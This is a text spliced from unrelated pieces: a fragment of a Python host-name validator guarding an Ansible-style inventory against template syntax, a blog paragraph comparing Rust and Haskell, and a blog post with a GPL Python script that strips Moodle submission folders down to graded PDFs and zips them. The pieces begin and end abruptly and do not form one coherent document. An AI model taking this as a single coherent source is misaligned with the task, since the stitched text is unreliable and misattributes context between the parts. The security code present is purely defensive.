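    if not VALID_HOSTNAME.match(name):
        raise ValueError(f"refusing suspicious host name: {name!r}")
    inventory.add_host(name)


class FakeInventory:
    """Minimal stand-in for Ansible's InventoryData, for illustration only."""

    def __init__(self):
        self.hosts = []

    def add_host(self, name):
        self.hosts.append(name)
```

This trades flexibility (no IPv6 literals with colons, for example, without extending the pattern) for a hard guarantee that template syntax never becomes a host name.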
The ? operator kind-of-looks-like being in a do block, but only for Option and Result, sadly. assert_cmd is excellent for describing testing/assertions in Rust itself, rather than via a separate, new DSL, like I was using shelltest for in Haskell.
To some extent, I feel like I found the missing arrow in the
quiver. Haskell is good, quite very good for some type of workloads,
but of course not all, and Rust complements that very nicely, with
lots of overlap (as expected). Python can fill in any quick-and-dirty
scripting needed. And I just need to learn more frontend, specifically
Typescript (the language, not referring to any specific
libraries/frameworks), and I ll be ready for AI to take over coding
So, for now, I ll need to split my free time coding between all of the
above, and keep exercising my skills. But so glad to have found a
good new language!
Assignment FooBar/
    Student A_21100_assignsubmission_file/
        graded paper.pdf
        Student A's perfectly named assignment.pdf
        Student A's perfectly named assignment.xopp
    Student B_21094_assignsubmission_file/
        graded paper.pdf
        Student B's perfectly named assignment.pdf
        Student B's perfectly named assignment.xopp
    Student C_21093_assignsubmission_file/
        graded paper.pdf
        Student C's perfectly named assignment.pdf
        Student C's perfectly named assignment.xopp

Before I can upload files back to Moodle, this directory needs to be copied (I have to keep the original files), cleaned of everything but the graded paper.pdf files and compressed in a ZIP.
You can see how this can quickly get tedious to do by hand. Not being a
complete tool, I often resorted to crafting a few spurious shell one-liners
each time I had to do this1. Eventually I got tired of ctrl-R-ing my
shell history and wrote something reusable.
Behold this script! When I began writing this post, I was certain I had cheaped
out on my 2021 New Year's resolution and written it in Shell, but glory!, it
seems I used a proper scripting language instead.
#!/usr/bin/python3
# Copyright (C) 2023, Louis-Philippe Véronneau <pollo@debian.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
This script aims to take a directory containing PDF files exported via the
Moodle mass download function, remove everything but the final files to submit
back to the students and zip it back.
usage: ./moodle-zip.py <target_dir>
"""
import os
import shutil
import sys
import tempfile
from fnmatch import fnmatch
def sanity(directory):
    """Run sanity checks before doing anything else"""
    base_directory = os.path.basename(os.path.normpath(directory))
    if not os.path.isdir(directory):
        sys.exit(f"Target directory {directory} is not a valid directory")
    if os.path.exists(f"/tmp/{base_directory}.zip"):
        sys.exit(f"Final ZIP file path '/tmp/{base_directory}.zip' already exists")
    for root, dirnames, _ in os.walk(directory):
        for dirname in dirnames:
            corrige_present = False
            for file in os.listdir(os.path.join(root, dirname)):
                if fnmatch(file, 'graded paper.pdf'):
                    corrige_present = True
            if corrige_present is False:
                sys.exit(f"Directory {dirname} does not contain a 'graded paper.pdf' file")


def clean(directory):
    """Remove superfluous files, to keep only the graded PDF"""
    with tempfile.TemporaryDirectory() as tmp_dir:
        shutil.copytree(directory, tmp_dir, dirs_exist_ok=True)
        for root, _, filenames in os.walk(tmp_dir):
            for file in filenames:
                if not fnmatch(file, 'graded paper.pdf'):
                    os.remove(os.path.join(root, file))
        compress(tmp_dir, directory)


def compress(directory, target_dir):
    """Compress directory into a ZIP file and save it to the target dir"""
    target_dir = os.path.basename(os.path.normpath(target_dir))
    shutil.make_archive(f"/tmp/{target_dir}", 'zip', directory)
    print(f"Final ZIP file has been saved to '/tmp/{target_dir}.zip'")


def main():
    """Main function"""
    target_dir = sys.argv[1]
    sanity(target_dir)
    clean(target_dir)


if __name__ == "__main__":
    main()
1. Typically something like renaming the graded paper.pdf files, deleting all .pdf and .xopp files using find and changing graded paper.foobar back to a PDF. Some clever regex or learning awk from the ground up could've probably done the job as well, but you know, that would have required using my brain and spending spoons...
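For comparison, the find-based cleanup step from those one-liners translates to a few lines of Python. This is an illustrative sketch, not part of the script above, and it assumes you run it on a disposable copy of the directory since it deletes files in place:

```python
from pathlib import Path


def delete_everything_but_graded(directory):
    """Delete every file except 'graded paper.pdf', recursively.

    Equivalent in spirit to the shell one-liner:
        find <dir> -type f ! -name 'graded paper.pdf' -delete
    """
    # Materialize the listing first so we never delete entries
    # out from under the directory iterator.
    for path in list(Path(directory).rglob("*")):
        if path.is_file() and path.name != "graded paper.pdf":
            path.unlink()
```

No rename-and-rename-back dance needed: matching on the exact file name sidesteps the problem the graded paper.foobar trick was solving.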